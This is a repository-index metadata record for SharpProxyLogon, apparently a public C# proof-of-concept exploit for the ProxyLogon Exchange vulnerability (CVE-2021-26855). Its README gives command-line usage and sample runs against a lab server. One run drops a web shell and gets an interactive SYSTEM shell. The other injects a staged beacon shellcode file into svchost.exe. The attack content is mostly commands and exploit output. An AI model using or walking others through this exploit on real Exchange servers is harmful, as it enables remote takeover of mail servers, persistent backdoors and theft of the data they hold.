{"id":13841021,"url":"https://github.com/Flangvik/SharpProxyLogon","last_synced_at":"2025-07-11T10:30:47.145Z","repository":{"id":108690962,"uuid":"352785704","full_name":"Flangvik/SharpProxyLogon","owner":"Flangvik","description":"C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection ","archived":false,"fork":false,"pushed_at":"2021-03-31T11:57:38.000Z","size":43,"stargazers_count":239,"open_issues_count":1,"forks_count":41,"subscribers_count":6,"default_branch":"main","last_synced_at":"2024-11-15T04:05:12.342Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Flangvik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-03-29T21:10:34.000Z","updated_at":"2024-10-25T11:34:12.000Z","dependencies_parsed_at":null,"dependency_job_id":"fbd4b903-2d9b-4b22-b137-cf0cdb25a9ce","html_url":"https://github.com/Flangvik/SharpProxyLogon","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpProxyLogon","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpProxyLogon/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpProxyLogon/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpProxyLogon/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Flangvik","download_url":"https://codeload.github.com/Flangvik/SharpProxyLogon/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225713021,"owners_count":17512538,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:01.481Z","updated_at":"2024-11-21T10:31:19.341Z","avatar_url":"https://github.com/Flangvik.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# SharpProxyLogon\n\nC# POC for the ProxyLogon chained RCE\n\n```\n __ _                        ___                       __\n/ _\\ |__   __ _ _ __ _ __   / _ \\_ __ _____  ___   _  / /  ___   __ _  ___  _ __\n\\ \\| '_ \\ / _` | '__| '_ \\ / /_)/ '__/ _ \\ \\/ / | | |/ /  / _ \\ / _` |/ _ \\| '_ \\\n_\\ \\ | | | (_| | |  | |_) / ___/| | | (_) \u003e  \u003c| |_| / /__| (_) | (_| | (_) | | | |\n\\__/_| |_|\\__,_|_|  | .__/\\/    |_|  \\___/_/\\_\\\\__, \\____/\\___/ \\__, |\\___/|_| |_|\n                    |_|                        |___/            |___/\n@Flangvik\n\nUsage Shell: SharpProxyLogon.exe \u003ctargetip\u003e \u003ctargetemail\u003e\nUsage x64 injection: SharpProxyLogon.exe \u003ctargetip\u003e \u003ctargetemail\u003e \u003cshellcodepath.bin\u003e \u003cinject-target-full-path\u003e\n```\n\nShellcode injection uses built-in [TikiTorch stub by @Rastamouse](https://github.com/rasta-mouse/TikiTorch), this will spawn, suspend and inject staged_beacon.bin into svchost.exe\n\n```\nSharpProxyLogon.exe 192.168.58.111:443 administrator@legitcorp.net C:\\Temp\\staged_beacon.bin \"C:\\Windows\\System32\\svchost.exe\"\n\n __ _                        ___                       __\n/ _\\ |__   __ _ _ __ _ __   / _ \\_ __ _____  ___   _  / /  ___   __ _  ___  _ __\n\\ \\| '_ \\ / _` | '__| '_ \\ / /_)/ '__/ _ \\ \\/ / | | |/ /  / _ \\ / _` |/ _ \\| '_ \\\n_\\ \\ | | | (_| | |  | |_) / ___/| | | (_) \u003e  \u003c| |_| / /__| (_) | (_| | (_) | | | |\n\\__/_| |_|\\__,_|_|  | .__/\\/    |_|  \\___/_/\\_\\\\__, \\____/\\___/ \\__, |\\___/|_| |_|\n                    |_|                        |___/            |___/\n@Flangvik\n\nUsage Shell: SharpProxyLogon.exe \u003ctargetip\u003e \u003ctargetemail\u003e\nUsage x64 injection: SharpProxyLogon.exe \u003ctargetip\u003e \u003ctargetemail\u003e \u003cshellcodepath.bin\u003e \u003cinject-target-full-path\u003e\n[+] Got hostname DC01\n[+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator\n[+] Got mailBoxId 7844b192-ae6a-4a16-afe4-269900d5c40a@legitcorp.net\n[+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500\n[+] Patched accountSID-\u003e S-1-5-21-2354578447-2549489838-160590685-500\n[+] Got msExchEcpCanary lR_xIbkU4EeRa8k0G_ekSjy7CrzM9dgIeCdYK8sMbRQMUoAQMnEfYvHrvDLT1j2jJMFBrpxnJ1s.\n[+] Got aspNETSessionID 0e8da60d-ff97-4748-80f1-5834caeba361\n[+] Got OABId 1d2e2d98-c636-43c7-a3a9-8041b545d575\n[+] Setting ExternalUrl...\n[+] Triggering ResetOABVirtualDirectory...\n[+] Shell should have landed, triggering injection\n```\n\nExample with classic webshell drop\n```\nSharpProxyLogon.exe 192.168.58.111:443 administrator@legitcorp.net\n\n __ _                        ___                       __\n/ _\\ |__   __ _ _ __ _ __   / _ \\_ __ _____  ___   _  / /  ___   __ _  ___  _ __\n\\ \\| '_ \\ / _` | '__| '_ \\ / /_)/ '__/ _ \\ \\/ / | | |/ /  / _ \\ / _` |/ _ \\| '_ \\\n_\\ \\ | | | (_| | |  | |_) / ___/| | | (_) \u003e  \u003c| |_| / /__| (_) | (_| | (_) | | | |\n\\__/_| |_|\\__,_|_|  | .__/\\/    |_|  \\___/_/\\_\\\\__, \\____/\\___/ \\__, |\\___/|_| |_|\n                    |_|                        |___/            |___/\n@Flangvik\n\nUsage Shell: SharpProxyLogon.exe \u003ctargetip\u003e \u003ctargetemail\u003e\nUsage x64 injection: SharpProxyLogon.exe \u003ctargetip\u003e \u003ctargetemail\u003e \u003cshellcodepath.bin\u003e \u003cinject-target-full-path\u003e\n[+] Got hostname DC01\n[+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator\n[+] Got mailBoxId 7844b192-ae6a-4a16-afe4-269900d5c40a@legitcorp.net\n[+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500\n[+] Patched accountSID-\u003e S-1-5-21-2354578447-2549489838-160590685-500\n[+] Got msExchEcpCanary V7mF62VZA0ay793xWTSE07chwKLM9dgIQolVMbEnWJJkvonIUO8VWm2BZdIklFP35W-mtZnUZ4Y.\n[+] Got aspNETSessionID 9028e0b3-e56c-4b33-b0e9-b66ab9ab9067\n[+] Got OABId cabf9619-178d-4d3e-84a3-748ec598a477\n[+] Setting ExternalUrl...\n[+] Triggering ResetOABVirtualDirectory...\n[+] Shell should have landed, going semi-interactive\nCMD #\u003ewhoami\nnt authority\\system\n\nCMD #\u003ehostname\nDC01\n\nCMD #\u003eipconfig\n\nWindows IP Configuration\n\n\nEthernet adapter Ethernet0:\n\n   Connection-specific DNS Suffix  . :\n   Link-local IPv6 Address . . . . . : fe80::2598:cc98:d369:b6ed%13\n   IPv4 Address. . . . . . . . . . . : 192.168.58.111\n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\n   Default Gateway . . . . . . . . . : 192.168.58.2\n\nCMD #\u003e\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FFlangvik%2FSharpProxyLogon","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FFlangvik%2FSharpProxyLogon","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FFlangvik%2FSharpProxyLogon/lists"}